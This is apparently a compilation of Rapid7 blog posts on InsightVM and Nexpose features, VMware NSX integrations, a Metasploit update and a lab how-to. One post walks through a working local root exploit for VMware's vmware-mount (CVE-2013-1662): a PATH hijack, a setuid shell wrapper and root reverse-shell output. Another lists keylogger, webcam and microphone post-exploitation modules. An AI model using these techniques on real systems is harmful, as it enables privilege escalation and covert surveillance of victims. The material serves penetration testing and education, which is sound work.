Rapid7 Blog

Virtual Infrastructure  

Modern Network Coverage and Container Security in InsightVM

For a long time, the concept of “infrastructure” remained relatively unchanged: Firewalls, routers, servers, desktops, and so on make up the majority of your network. Yet over the last few years, the tides have begun to shift. Virtualization is now ubiquitous, giving employees tremendous leeway in their ability to spin up and take down new machines at will. Large chunks of critical processes and applications run in cloud services like Amazon Web Services (AWS) and Microsoft Azure. Containers have made it easy to create and launch large applications across any infrastructure.

With all these magical improvements to flexibility and efficiency comes additional risk. Network infrastructure is no longer a room on the second floor of your office building; instead, it's a constantly morphing and shifting mass of potentially vulnerable virtual and cloud devices. Soon, InsightVM, Rapid7's analytics-driven vulnerability management solution, will provide the ability to understand and assess the modern and ever-changing network. Our first major step: container security.

I've got a container security problem

Container technology has been growing by leaps and bounds in recent years; it has come a long way from the days of Solaris Zones. If you're into data, check out DataDog's view of Docker adoption. Year-over-year growth of real, productive use of Docker is 40%. Why is that?

Containerization shifts not only the deployment philosophy, process, and speed, but more importantly the ownership of IT assets. What once was a clear divide between IT asset owner and software developer/service provider may now be blurry. Software developers use containers to manage more and more application deployment, meaning IT becomes less and less responsible for patching libraries and dependent software packages. When shipped within the container, software dependencies are no longer managed by the host OS but instead by the runtime container environment. Application developers get more efficient. IT teams have less control and less visibility, without any reduction in responsibility.

With greater efficiency comes greater risk

In the history of infrastructure, containers are just another technology with which security teams must come to grips. But they also have some unique characteristics that change the behavior of infrastructure. Specifically:

- Containers are ephemeral. They make modern infrastructure move faster. According to DataDog, “containers have an average lifespan of 2.5 days, while across all companies, traditional and cloud-based VMs have an average lifespan of 23 days.”
- Container hosts may be densely packed with risk. Much like their hypervisor relatives, container hosts can run any workload and, therefore, assume any risk.
- Containers are designed to be mixed and matched in myriad ways. Containers aren't assets—nor are they business applications. Container images are immutable building blocks, defined by their cryptographic hash.

When combining the factors above, it becomes clear that securing container technology is different than securing a general purpose server or virtual machine.

Securing containers with InsightVM

We are working on capabilities in InsightVM to help you assess and contain this risk in 3 primary ways:

1. Discovery: InsightVM will increase visibility of where your Docker hosts live in your world so you know where to begin your efforts to contain your container problem. InsightVM will also identify container images, whether running or stopped, and put them at your fingertips: fully searchable by cryptographic hash or container metadata. Simple, easy-to-understand solutions often win the day for time-starved teams. Start with discovery, and increase capability from there. InsightVM will allow customers to discover Docker containers across their environment and understand their container attack surface.

2. Configuration: InsightVM will identify container hosts that do not comply with CIS benchmarks for common OSes and Docker itself, and combine that with best-in-class vulnerability and remediation built for IT teams. Ask yourself, which represents less risk, a) or b)?

a) A container image: purposefully configured, built for an application's specific needs
b) A container host: a general purpose computer, configured to run Docker, patched or unpatched

At face value, I'll take the purposefully configured container over the general purpose computer any day. Even though container images are ephemeral, numerous, and—worst of all—created by those wily developers, they are not general purpose computers and present a different attack surface. Confirm your container hosts are securely configured and vulnerability-free, and you've reduced risk across any container that runs on the host.

3. Assessment: InsightVM will offer a fully integrated container assessment service, providing visibility into vulnerabilities and risk associated with the components and layers of a container. This includes full searchability by cryptographic hash or container metadata. With these additions, InsightVM will make it easy for you to:

- Perform vulnerability assessment on the container image as it is deployed and exists in production
- Perform vulnerability assessment on the container image as it is built, prior to deployment

Security teams that have strong application development partnerships can integrate directly into DevOps pipelines (i.e. CI/CD). But for those who do not enjoy such visibility or relationships with development teams, fear not: you can collect and assess a container image as it exists on the container host itself.

We are now conducting direct customer engagement on these capabilities through the Rapid7 Voice program with InsightVM customers and will roll out new capabilities starting in Q2 2017. Of course, we have much, much more in store, and I encourage you to reach out to your Customer Success Manager or Account Executive to learn more. Also, if you're not a Rapid7 customer, you can try a free trial of InsightVM for 30 days!

NOTE: Rapid7 creates innovative and progressive solutions that help our customers confidently get their jobs done. As such, the development, release, and timing of any product features or functionality described remains at our discretion in order to ensure our customers the excellent experience they deserve, and is not a commitment, promise, or legal obligation to deliver any functionality.

Software defined security made real

This week we're headed for VMworld 2014 in San Francisco and we're excited to be talking about how Rapid7 is partnering with industry leaders like Symantec, Palo Alto Networks, and of course VMware to build out the VMware NSX security ecosystem. Together we've created an integrated system that collaborates, leveraging the NSX platform to automate risk identification and mitigation for VMware customers.

Why does this matter to security professionals?

Well, in order to protect against today's threats and evolving landscape, security teams are constantly challenged to deploy best practices such as isolation and network segmentation, including micro-segmentation at the application or asset level. This process can be difficult and costly to manage effectively. With VMware NSX (the network virtualization component of the software-defined data center (SDDC)) teams can more easily adopt these practices.

Let's go through an example scenario of how you can automate isolation and micro-segmentation.

An Application Admin makes a change like applying a patch to their web services in the SDDC. Unknown to the admin, the patch he just applied was old and contained an easily exploitable vulnerability that could compromise PII data. Symantec Data Security Center detects the change in real time and runs the asset through their security policy rules. In this scenario, a rule determines that a vulnerability assessment needs to be run immediately and notifies Rapid7 Nexpose. Nexpose then performs a vulnerability scan directly through the hypervisor, increasing visibility and performance. Nexpose finds the critical vulnerability caused by this patch and notifies Symantec Data Security Center.

This is all happening based on the policies and automated workflows. It keeps going. Palo Alto Networks recommends the machine be quarantined because of sensitive data in this application. The Security admin agrees with that recommendation, so Palo Alto restricts access to the machine and NSX quarantines it. Done. The virtual machine is safely quarantined until further actions are taken to make it secure.

This complete workflow is orchestrated through our Symantec, Palo Alto Networks, and VMware partnerships. It just scratches the surface of other automated workflows that are possible. For more information on each solution, check out the video or, even better, join us all at VMworld 2014 this week.

Real-time Protection from Nexpose & VMware NSX

One of Nexpose's core promises is that we will give you actionable visibility into your physical, cloud, and virtual environments to help you identify what assets are on your network, and what are the most critical security risks to remediate. As a part of supporting that visibility, Rapid7 and VMware announced last August that Rapid7 is the first VMware NSX network and security platform ecosystem partner for vulnerability management. This partnership delivers a revolutionary approach to vulnerability management in conjunction with the software-defined data center (SDDC). By scanning directly through the hypervisor, security teams can reduce the load on the network, improve security with comprehensive analysis, and automatically isolate risky assets. Let's take a look at how this improves visibility and helps you create an appropriate action plan.

With VMware NSX, you can easily use isolation and segmentation as a security best practice, which makes it easy for security teams to create virtual networks that match their unique needs and their security best practices. These networks can be updated frequently and easily as the needs of the business change. This is where the Rapid7-VMware interoperability shines: since Nexpose scans directly through the hypervisor, it has full visibility into all the virtual machines regardless of the virtual network topology. Interoperability at the hypervisor level also means that administrators can get the benefits of credentialed scans without the overhead of having to manage credentials. This ensures an up-to-date and accurate picture of your full virtual network.

Running in a software-defined data center, security teams can easily deploy a layered approach to security. However, identifying and remediating the top vulnerabilities, misconfigurations and missing controls remains essential. Looking at the context around a security risk can help to ensure that the team is focused on the most important updates. For example, does that server that's exposed to the internet have a remote code execution vulnerability with a Metasploit module available? What about a virtual machine that is vulnerable to an Adobe Reader zero-day? Armed with this insight, you can efficiently prioritize and remediate the greatest risks.

However, not even the most efficient security team can be on top of every security risk every time. When interoperating with Rapid7, VMware NSX can trigger an automated workflow to protect organizations from an attack on a weakness in the operating system or an application on a virtual machine. If a high risk vulnerability is identified, Nexpose will automatically create a security tag on that virtual machine in VMware NSX. Security teams can use this tag to automatically put the VM into a "secure" virtual network segment or into an isolation area. This segment can be a quarantined area or one that has limited access to the rest of your network. Attackers will not be able to get to these vulnerable systems. After the high risk vulnerabilities are remediated, the virtual machine will be moved back to its original location. This real-time approach reduces the attack surface and buys additional time to remediate the vulnerability.

We are excited about this partnership and the ways that Nexpose and VMware NSX customers can get actionable visibility into the most important vulnerabilities in virtual machines on their network, along with the automated protection of being able to quarantine risky assets. If you'd like to find out more about this innovative integration, please contact us at info@rapid7.com, call 866-7-RAPID7, or read our datasheet.

Weekly Update: Meterpreter Updates, VMWare, the OSX spycam, Retabbing, and more!

Meterpreter Updates

This is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help out on advancing the state of Meterpreter by leaps and bounds. Despite Metasploit's massive Ruby footprint, most security developers know Python well enough to scratch their own penetration testing itches in it, so I'm looking forward to a lot of active development here. Plus, since Python is part of the Linux Standard Base, you're quite likely to find it on pretty much any normal Linux distribution, so it should see a lot of use for non-Microsoft targets.

In other Meterpreter news, we have a new contributor entering the fray on the Windows 32-bit and 64-bit side by the name of OJ Reeves. His entire mission in life (at least, for now) is to make it much easier for normal humans to compile, test, and extend Meterpreter for the Windows platform. If you've been down this hacking-Meterpreter path in the past, you know what kind of pit vipers can be lurking in that code, so expect to see some massive improvements there in the next couple of weeks.

VMWare Setuid Exploit (CVE-2013-1662)

This week also sees a new local privilege exploit targeting Linux, the VMWare Setuid vmware-mount Unsafe popen(3) module (aka vmware-mount.rb). Discovered by Google's Tavis Ormandy and implemented by our own James "Egypt" Lee, this exploits a setuid vulnerability that takes advantage of a VMWare installation to sneak a root shell. Egypt discusses the Metasploit implementation at length in this blog post, so I encourage you to check it out. Note that this module does not enable attackers to escape from the VMWare guest to the host operating system; it's specifically useful for taking advantage of a VMWare installation to elevate privileges on the host OS itself.

More OSX Hijinks

The other set of modules I want to highlight is a trio from Rapid7's Joe Vennix: the OSX Capture Userspace Keylogger module, the OSX Manage Record Microphone module, and the OSX Manage Webcam module. As you can probably guess from their titles, these are all post-exploit modules penetration testers can exercise to extend their eyes and ears into the site under test. These kinds of Hollywood-hacker style post-exploit tricks are exactly the kind of thing that is great to demo to clients to help explain the true risk associated with Apple desktop / laptop bugs, since they are, by their nature, pretty dramatic and fun to use.

Tab Assassin

Finally, this week, we're going to be pulling the trigger on the great retabbing of Metasploit in order to bring us up to the normal, regular coding standards common to Ruby projects. While I have every expectation this change will be traumatic for long-time contributors, we're faithfully documenting everything along the way under the shortlink http://r-7.co/MSF-TABS. If you have patches and pull requests that are suddenly thrown into a conflicted state this week, the retabbing from @Tabassassin (pictured right) is probably the root cause. But never fear, just read the fine material regarding the change, and you should be back into an unconflicted state in two shakes.

New Modules

We've got eleven new modules this week. Including the ones mentioned above, we've got another three ZDI-derived exploits (which are always informative), a really nicely commented implementation of the MS13-059 exploit for Internet Explorer, and a pair of Windows post modules that can be used to further extend control over the victim machine. As always, thanks everyone for your contributions!

Exploit modules
- VMWare Setuid vmware-mount Unsafe popen(3) by egyp7 and Tavis Ormandy exploits CVE-2013-1662
- SPIP connect Parameter PHP Injection by Arnaud Pachot, Davy Douhine, and Frederic Cikala exploits OSVDB-83543
- HP LoadRunner lrFileIOService ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-182
- HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-207
- Firefox XMLSerializer Use After Free by juan vazquez and regenrecht exploits ZDI-13-006
- MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free by sinn3r and corelanc0d3r exploits MS13-059

Auxiliary and post modules
- OSX Capture Userspace Keylogger by joev
- OSX Manage Record Microphone by joev
- OSX Manage Webcam by joev
- Windows Gather Prefetch File Information by TJ Glad
- Windows Manage Set Port Forwarding With PortProxy by Borja Merino

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Fun With VMware Utilities: vmware_mount Exploit (CVE-2013-1662)

On August 22, Tavis Ormandy dropped a bug in VMWare that takes advantage of a build configuration in Linux distributions. Providing you have user-level access to a Debian or Ubuntu box with VMWare installed, this exploit gives you root access. It's a fun bug and I want to explain how the Metasploit module for it works.

The background

There's this thing called priv_mode in bash that means it will drop privs if euid != uid. Anyone who has ever tried to "chmod +s /bin/sh" will recognize this as a minor frustration that is easily circumvented by simply writing a wrapper in C that does something like:

    #define _GNU_SOURCE   /* setresuid(2) is a GNU extension on glibc */
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        setresuid(0, 0, 0);                   /* real, effective and saved uid all become root */
        execl("/bin/sh", "sh", (char *)NULL); /* argv list must end with a NULL sentinel */
        return 0;
    }

That is not the thing that priv_mode is meant to fix (although it is annoying if you don't know what's happening when it appears that your privilege escalation bug is getting you an unprivileged shell). What it is really effective at stopping is the case of a setuid binary calling system(3) or popen(3) before dropping privs. It turns out that VMWare Workstation and Player ship with a binary called vmware-mount that does exactly this.

The steps for achieving privilege escalation are pretty straightforward:

1. Create an executable to be used as our payload
2. Write it to the host OS's filesystem (in this case, we have to call it lsb_release)
3. Mark it executable
4. Run the vulnerable setuid binary

The exploit

This exploit will drop our payload as an executable, so first we include the Msf::Exploit::EXE mixin, which will give us access to several convenience methods for creating executables.

    include Msf::Exploit::EXE

Then, in the exploit method, we create an ELF file with generate_payload_exe. This method is smart enough to build the right kind of executable for whatever platform and architecture is supported by the module and currently selected. Then we just write the file and execute the vulnerable utility with the current directory added to the path. These three lines are basically the meat of the exploit.

    write_file("lsb_release", generate_payload_exe)
    cmd_exec("chmod +x lsb_release")
    cmd_exec("PATH=.:$PATH vmware-mount")

When our shell runs, it will block the controlling process. In our case, that would cause the existing shell session to hang, which is pretty impolite. To solve that problem, we prepend some shellcode to the generated binary that just forks and exits the parent process, leaving our payload to happily frolic about in the background.

The money shot

    15:09:57 0 1 exploit(vmware_mount) > sessions -i 1
    [*] Starting interaction with 1...

    id
    uid=1000(egypt) gid=1000(egypt) groups=1000(egypt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
    ^Z
    Background session 1? [y/N]  y
    15:09:05 0 1 exploit(vmware_mount) > show options

    Module options (exploit/linux/local/vmware_mount):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION  1                yes       The session to run this module on.

    Payload options (linux/x86/shell/reverse_tcp):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.99.1     yes       The listen address
       LPORT  1234             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

    15:09:10 0 1 exploit(vmware_mount) > run

    [*] Started reverse handler on 0.0.0.0:1234
    [*] Max line length is 65537
    [*] Writing 175 bytes in 1 chunks of 529 bytes (octal-encoded), using printf
    [*] Sending stage (36 bytes) to 192.168.99.1
    [*] Command shell session 2 opened (192.168.99.1:1234 -> 192.168.99.1:41671) at 2013-09-04 15:08:16 -0500

    id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare),1000(egypt)

Want to give this a try yourself? If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.
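To make the vmware-mount mechanism concrete from the defender's side, here is an added example of mine (not code from the post, Metasploit or VMware): it reproduces the PATH walk a shell performs for a bare command name, shows a planted file winning when an attacker-controlled directory comes first, and contrasts that with a launcher that uses an absolute path, a fixed environment and dropped privileges. The helper name, the scratch directory and the exit codes are constructed.

```python
"""Added example (mine, not from the post, Metasploit or VMware): the PATH
lookup that lets a privileged helper running a bare command name through a
shell be hijacked, next to a launcher that cannot be. The helper name,
scratch directory and exit codes are constructed."""
import os
import subprocess
import tempfile

TRUSTED_PATH = "/usr/bin:/bin"   # fixed search path a privileged program should use


def shell_style_lookup(name, path_env):
    """Emulate what /bin/sh does for popen("lsb_release"): take the first
    executable match while walking the inherited PATH directory by directory.
    An empty element or '.' means the current directory, which is exactly
    what PATH=.:$PATH abuses. Returns None when nothing matches."""
    for directory in path_env.split(":"):
        candidate = os.path.join(directory or ".", name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def run_helper_hardened(abs_path, args=()):
    """Launch a helper the way a setuid program should: no shell, an absolute
    path, a minimal explicit environment, and privileges dropped to the real
    uid/gid in the child before exec (a no-op for an ordinary process, the
    decisive step for a setuid one). Returns the helper's exit status."""
    if not os.path.isabs(abs_path):
        raise ValueError("refusing a PATH lookup for a privileged helper")

    def drop_privileges():
        os.setgid(os.getgid())
        os.setuid(os.getuid())

    proc = subprocess.run([abs_path, *args], env={"PATH": TRUSTED_PATH},
                          preexec_fn=drop_privileges, check=False)
    return proc.returncode


def rejects_relative_path(name="lsb_release"):
    """True when the hardened launcher refuses a bare command name."""
    try:
        run_helper_hardened(name)
    except ValueError:
        return True
    return False


def demo_path_hijack():
    """Plant an executable named like the expected helper in a directory the
    unprivileged user controls and prepend that directory to PATH, as the
    exploit does with the current directory. Returns a pair: whether the
    shell-style lookup picked the planted file, and whether the same name
    resolves at all under the trusted PATH."""
    helper = "demo_helper_cve_2013_1662"   # constructed name, not a real tool
    with tempfile.TemporaryDirectory() as scratch:
        planted = os.path.join(scratch, helper)
        with open(planted, "w") as handle:
            handle.write("#!/bin/sh\nexit 42\n")
        os.chmod(planted, 0o755)
        inherited = f"{scratch}:{TRUSTED_PATH}"   # attacker-controlled PATH
        hijacked = shell_style_lookup(helper, inherited) == planted
        trusted = shell_style_lookup(helper, TRUSTED_PATH) is not None
        return hijacked, trusted


if __name__ == "__main__":
    print("hijacked under inherited PATH, found under trusted PATH:",
          demo_path_hijack())
    print("hardened launcher exit status:",
          run_helper_hardened("/bin/sh", ["-c", "exit 3"]))
```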

VMworldTV Meets the Team Behind Rapid7

Earlier this week, I blogged that Rapid7 is part of the VMware NSX ecosystem and gave you an overview of the solution we are working on together with VMware. Check out the below interview with VMworldTV to learn more.

Lee Weiner, SVP, Products & Engineering at Rapid7, talks about the integration between Nexpose and VMware NSX and the key benefits to organizations.

Tas Giakouminakis, Co-Founder & CTO at Rapid7, goes through a demonstration of the solution.

Now that there are more details, I'm sure everyone really wants to know when the solution is publicly available. Again, please stay tuned; we are working hard with VMware to bring this solution to our customers.

Rapid7 part of VMware NSX Partner ecosystem

We're very excited that VMware is showcasing Rapid7 as an official VMware NSX Partner at VMworld 2013 this week, demonstrating how we provide best-in-class vulnerability management for virtual networks.

Rapid7 has been a longtime partner with VMware. In 2011, we introduced our vAsset discovery method that allows Nexpose to have real-time visibility into changes to your virtual environment. This helped solve the gap security administrators commonly had with knowing how their virtual environment is changing. Fast forward to 2013: now we are revolutionizing how core vulnerability assessment is done in a virtual infrastructure.

We've listened to the challenges our customers have with vulnerability scanning in virtual environments and worked closely together with VMware to develop a joint solution. Customers frequently told us that traditional vulnerability scans run over the network against virtual machines to identify vulnerabilities. As a result, this takes up network bandwidth, only identifies devices connected to the network, and is limited to the speed of the connection. And deep scanning requires authenticated scan credentials to be supplied, which can be a time consuming process with additional management overhead. This prevented them from having real-time visibility into the vulnerabilities in their virtual environment.

To address these challenges, Nexpose integrates fully with the NSX platform to perform vulnerability scans through the hypervisor without requiring a network connection between scan engine and virtual machines to identify security risk. By leveraging the NSX platform, authentication credentials do not need to be supplied for deep scanning of assets, both online, for vulnerabilities and insecure configurations. Users can safely scan their virtual devices in an efficient manner to avoid any VM Network "Storm" scenarios, even as virtual devices move from server to server.

The benefits from this approach are:
- fast and accurate vulnerability assessment by scanning through the hypervisor,
- minimized network traffic and target scan host impact,
- automated setup and configuration of Nexpose to scan your virtual environment based on changing VMware NSX infrastructure, and
- automated security protection through VMware NSX by leveraging security-based tags created by Nexpose based upon security risk to organizations.

This solution will provide security administrators with real-time visibility into their security risk for virtual machines with reduced management overhead.

Now I know everyone is wondering when this will be available. Stay tuned; we are still working hard with VMware to bring this solution to our customers.

Free Metasploit Penetration Testing Lab In The Cloud

No matter whether you're taking your first steps with Metasploit or if you're already a pro, you need to practice, practice, practice your skillz. Setting up a penetration testing lab can be time-consuming and expensive (unless you have the hardware already), so I was very excited to learn about a new, free service called Hack A Server, which offers vulnerable machines for you to pwn in the cloud. The service only required that I download and launch a VPN configuration to connect to the vulnerable machines. Since I already had my Metasploit instance set up on BackTrack, it only took minutes to get started. Once you're up and running, you can choose from a large number of vulnerable machines, including Metasploitable. (Note: If you'd prefer to set up your own Metasploitable instance, you can download Metasploitable here.)

This how-to will use BackTrack 5 R3, which is available from backtrack-linux.org, but you should also be able to use any other Linux distribution. I did not see any way on the Hack-A-Server website to get their VPN client working on Windows, so I'd recommend you stick to Linux. I already pre-registered my version of Metasploit on BackTrack for the quick penetration test in the latter part of this post. If you need help, check out this blog post on activating Metasploit on BackTrack 5 R3.

If you'd like to use the service, go to Hack A Server and sign up for a free account. Once you're signed up, choose Training Area in the toolbar. As you can see, they have a ton of vulnerable machines available on the service. For the purpose of this test, we're going to choose Metasploitable. Click on the Hack it! button.

Download the connection certificate to root, then run the following commands:

    unzip pradameinhoff-connectionpack.zip
    openvpn client.conf

Note: The zip file will have a different name (pradameinhoff is my username on HackAServer.com). Type ls to view how it looks in your directory. If your VPN client has started correctly, you should now see something like this on the screen.

Open a second terminal window and ping the Metasploitable server on 10.2.32.232 (this was listed on the HTML page earlier):

    ping 10.2.32.232

You should be seeing something like this on your screen. This proves that you have a network connection to the Metasploitable machine. Congratulations!

Now let's exploit the machine with Metasploit Pro:

1. Open your Firefox browser to https://localhost:3790
2. Go into the default project and click on the Scan button. Enter 10.2.32.232 and click Launch Scan.
3. Once the scan has completed, go to the Analysis menu and choose the Hosts option. You should now see the host in the list.
4. Select the checkbox next to the Metasploitable machine and click the Exploit button in the toolbar.
5. On the next screen, click Exploit on the bottom right. Metasploit Pro will now match up the right exploits with the operating system and services fingerprinted on the Metasploitable machine and then launch the smart exploitation process. For Metasploitable, it will likely be successful with exploit/unix/misc/distcc_exec. (If you are using Metasploit Community, you can manually choose this exploit since this edition doesn't support the smart exploitation process.)
6. Once the smart exploitation process has completed, click on the Sessions button in the toolbar. You should see one open session.
7. Click on Collect, check the box next to Session 1, and click the Collect System Data button on the bottom right. Metasploit Pro will now collect passwords, screenshots, and other evidence from the machine. Going back to the Hosts screen in the Analysis menu, you'll see that the machine is marked as looted.

Congratulations again - you've compromised your first machine. Now you can also check out some other vulnerable machines on the same network, which you can also reach through the same VPN connection provided by the Hack-a-Server website.

I'd be interested to hear how you find the service and whether it worked as seamlessly for you as it did for me. Please log in and leave your comment below!

Getting the Most from Customizable CSV Exports - Part 6

Hi, my name is Eden Martinez, and I'm a Federal Sales Engineer with Rapid7. Larger environments often list scalability as one of their top problems; specifically, too much data. With current tools, it's not hard to generate large data sets: most tools are comprehensive, with a focus on the largest list of results winning. While you can turn all the knobs on Nexpose up to 11, I've found many enterprise environments prefer to focus on prioritization of vulnerabilities and trending of the results. Management in particular needs to see, at a glance, how the vulnerability program is doing over time. Criteria vary per environment, but a high/medium/low classification of severity is common, with the lows potentially being weeded out (ICMP Timestamp, for example). While Nexpose has some great trending reports out of the box today, one view it can't currently give is slicing time into segments (30 days, quarters, etc.). Nexpose's risk scoring is very rich, and I highly recommend using it to prioritize remediation. One problem with a numerical risk score is that it loses context outside of the tool, away from the rest of the data and assets, which is not good for management that isn't hands-on with Nexpose. Exactly how bad is a score of 919? A high is always going to be just that: higher than medium or low. Additionally, for compliance and standardization, many Federal environments are standardizing on CVSS, so I use that as the basis for the severity levels. I've put something together to help fill that gap with a little Excel Visual Basic. Hope it helps. Let me know if you have any questions in the comments section.

Report 1: I'd like to see a breakdown of vulnerability severity by 30-day increments.

WHO: Primarily management, security or IT, who need to see better trending and breakdowns. To keep the report high level I didn't include the vulnerabilities themselves, but they could easily be added.
WHAT: Breakdown of High, Medium and Low by CVSS-derived severity level: 10-8, 7-5 and 4-1 respectively. (The Severity Level that Nexpose exports is an integer from 1 to 10, so these three ranges cover every value; if you export the raw decimal CVSS score instead, decide up front which band a 7.5 belongs to.) Trying to prove that less is more, I pull only two data fields out of Nexpose: Severity Level and Vulnerability Age. I left everything on one worksheet, which is messier but shows more clearly how the data is manipulated by Excel. Nexpose includes the word Days in the vulnerability age, and it's easy enough to copy that data into a new column for additional calculations. The Setup Command macro runs through all the data to generate what the pivot chart needs; the chart is already created and just uses the Vulnerability Severity Level and Trending Age columns.

WHY: When management can see a good chart that shows no red flags, they leave everyone alone!

HOW: You'll need to use my Excel worksheet, with macros enabled (sorry). No virus in there, promise, but you can throw it into a dev environment. (Treat it like any other macro-enabled workbook you receive: open it in an isolated VM and read the VBA module before enabling macros.) If you want to put your own data in here, just copy over columns A and B. The macro is smart enough to calculate the number of rows automatically without you needing to define it anywhere. Click the Setup button to recalculate at any time. Want to weed out results less than 30 days old, or the lows? Click the Vulnerability Severity Level or Trending Age buttons on the pivot chart and uncheck those boxes.
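The same bucketing the macro performs, as an added example in Python rather than the Excel worksheet from the post (this is not the post's VBA): it reads the two exported columns, Vulnerability Severity Level and Vulnerability Age, strips the word Days, assigns the post's High/Medium/Low bands and 30-day age increments, counts findings per cell the way the pivot chart does, and applies the two filters the post mentions (hide the Lows, hide anything under 30 days). The CSV rows are constructed for illustration; the band boundaries for a decimal score (8 and above High, 5 and above Medium, 1 and above Low) are my assumption, since the post only gives integer ranges.

```python
import csv
import io
import re
from collections import Counter

# Constructed sample in the shape of a Nexpose CSV export trimmed to the two
# columns the post pulls (the column names are the export's own labels).
SAMPLE_CSV = """Vulnerability Severity Level,Vulnerability Age
10,3 Days
9,45 Days
7,12 Days
5,70 Days
4,100 Days
2,31 Days
8,60 Days
"""


def severity_bucket(level):
    """Map a severity level to the post's bands: 8-10 High, 5-7 Medium, 1-4 Low.

    The exported level is an integer, so the bands cover every value. A decimal
    CVSS score fed in here falls into the band whose lower bound it reaches
    (7.5 is Medium); that boundary choice is an assumption, not the post's.
    """
    level = float(level)
    if level >= 8:
        return "High"
    if level >= 5:
        return "Medium"
    if level >= 1:
        return "Low"
    return "None"


_AGE_RE = re.compile(r"(\d+)\s*Days?", re.IGNORECASE)


def parse_age_days(text):
    """Strip the word 'Days' that Nexpose puts in the age field and return an int."""
    match = _AGE_RE.search(text)
    if not match:
        raise ValueError("unrecognised age value: %r" % text)
    return int(match.group(1))


def age_bucket(days, width=30):
    """Return the 30-day increment a finding falls into: '0-30', '31-60', ..."""
    index = max(days - 1, 0) // width
    low = index * width + 1 if index else 0
    return "%d-%d" % (low, (index + 1) * width)


def pivot(csv_text, drop_low=False, min_age_days=0):
    """Count findings per (age bucket, severity band).

    drop_low and min_age_days reproduce the two filters the post applies on the
    pivot chart: hiding the Lows and hiding anything younger than 30 days.
    """
    counts = Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        band = severity_bucket(row["Vulnerability Severity Level"])
        days = parse_age_days(row["Vulnerability Age"])
        if drop_low and band == "Low":
            continue
        if days < min_age_days:
            continue
        counts[(age_bucket(days), band)] += 1
    return dict(counts)


def render(counts):
    """Lay the counts out as a plain-text table, one row per age bucket."""
    buckets = sorted({b for b, _ in counts}, key=lambda b: int(b.split("-")[0]))
    lines = ["%-12s %5s %7s %5s" % ("Age (days)", "High", "Medium", "Low")]
    for bucket in buckets:
        cells = [counts.get((bucket, band), 0) for band in ("High", "Medium", "Low")]
        lines.append("%-12s %5d %7d %5d" % (bucket, *cells))
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(pivot(SAMPLE_CSV)))
    print()
    print(render(pivot(SAMPLE_CSV, drop_low=True, min_age_days=30)))
```

Point it at a real export by replacing SAMPLE_CSV with the file contents; the age regex tolerates "1 Day" as well as "45 Days", and any row whose age field does not parse raises rather than silently landing in the wrong bucket.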

Automating Nexpose Discovery Connections through the Java API

Nexpose has long offered APIs allowing for automated workflow operations. The following examples are intended to help Nexpose users automate the discovery connection feature through the API, and show how to use the Java API client to create, list, update and delete discovery connections in Nexpose. Nexpose supports the discovery connection API starting with version 5.2.

The supported discovery operations in the API are:

DiscoveryConnectionCreateRequest - Creates a discovery connection. This also establishes the connection between Nexpose and the discovery source; for instance, you would use it to create a connection to a VMware deployment managed by a vCenter Server instance.
DiscoveryConnectionConnectRequest - Re-establishes a lost connection.
DiscoveryConnectionUpdateRequest - Updates the settings of an existing discovery connection. Use this when the password of the account Nexpose uses for the connection changes; for instance, if you rotate the password of the Nexpose user in VMware, the connection must be updated to reflect it. (That account only needs to read the vCenter inventory, so give it a dedicated, least-privilege role rather than an administrator login.)
DiscoveryConnectionListingRequest - Lists the discovery connections that exist in Nexpose.
DiscoveryConnectionDeleteRequest - Deletes a discovery connection.

I have enhanced the Java API client to support these operations; the latest code can be checked out from clee-r7/nexpose_java_api · GitHub. The following are examples of using the operations from Java code. Every request takes the session ID and a sync ID first, and the XPath-style expression passed to grab selects a single attribute from the XML response.

1) Create operation

    DiscoveryConnectionCreateRequest createConnectionRequest = new DiscoveryConnectionCreateRequest(
        sessionID,      // the session ID
        "sync",         // the sync ID
        "username",     // the user name used to connect to the server
        "HTTPS",        // the protocol used to connect to the server
        "port number",  // the port used to connect to the server
        "vcenter",      // the name of the server
        "con1",         // the name of the connection
        "password");    // the password used to connect to the server
    APIResponse createConnectionResponse = session.executeAPIRequest(createConnectionRequest);
    // Get the connection ID from the response.
    String connectionID = createConnectionResponse.grab("/DiscoveryConnectionCreateResponse/@id");

2) Update operation

    DiscoveryConnectionUpdateRequest updateConnectionRequest = new DiscoveryConnectionUpdateRequest(
        sessionID,      // the session ID
        "sync",         // the sync ID
        "username",     // the user name used to connect to the server
        "HTTPS",        // the protocol used to connect to the server
        "port number",  // the port used to connect to the server
        "vcenter",      // the name of the server
        "con1",         // the name of the connection
        "password",     // the password used to connect to the server
        connectionID);  // the ID of the connection being updated
    APIResponse updateConnectionResponse = session.executeAPIRequest(updateConnectionRequest);
    // Get the sync ID from the response.
    String syncID = updateConnectionResponse.grab("/DiscoveryConnectionUpdateResponse/@sync-id");

3) Delete operation

    DiscoveryConnectionDeleteRequest deleteConnectionRequest = new DiscoveryConnectionDeleteRequest(
        sessionID,      // the session ID
        "sync",         // the sync ID
        connectionID);  // the ID of the connection to delete
